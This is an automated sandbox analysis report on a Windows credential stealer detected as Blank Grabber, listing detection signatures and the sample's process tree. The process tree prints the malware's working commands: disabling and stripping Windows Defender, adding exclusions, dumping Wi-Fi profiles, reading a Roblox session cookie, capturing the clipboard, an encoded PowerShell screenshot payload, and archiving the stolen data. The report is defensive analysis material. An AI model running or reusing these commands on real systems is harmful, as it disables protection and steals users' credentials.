Edit tour

Windows Analysis Report
#U202f#U202f#U2005#U00a0.scr.exe

Overview

General Information

Sample name:	#U202f#U202f#U2005#U00a0.scr.exe renamed because original name is a hash value
Original sample name:	.scr.exe
Analysis ID:	1487425
MD5:	d87b402b821fa842d89283aa8654d9c0
SHA1:	30c086651e1bcd191163c01efbab55f51ec04691
SHA256:	791a66abbd58ac34dc72565455fb6e596bb14b93aa5b0109e0d53c60b87b5678
Tags:	exe
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses an obfuscated file name to hide its real file extension (RTLO)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Very long command line found

Writes or reads registry keys via WMI

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

#U202f#U202f#U2005#U00a0.scr.exe (PID: 1788 cmdline: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe" MD5: D87B402B821FA842D89283AA8654D9C0)

#U202f#U202f#U2005#U00a0.scr.exe (PID: 5260 cmdline: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe" MD5: D87B402B821FA842D89283AA8654D9C0)

cmd.exe (PID: 4432 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6640 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 744 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2860 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 7480 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2672 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6000 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7376 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 5556 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7296 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 6524 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7320 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 6844 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7312 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7364 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7540 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7668 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7692 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 7860 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 7748 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7876 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7756 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7908 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 8120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 8152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 8176 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 3924 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8184 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 3652 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7472 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7576 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7712 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7212 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7064 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7480 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7828 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7904 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 7616 cmdline: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 8132 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 1568 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

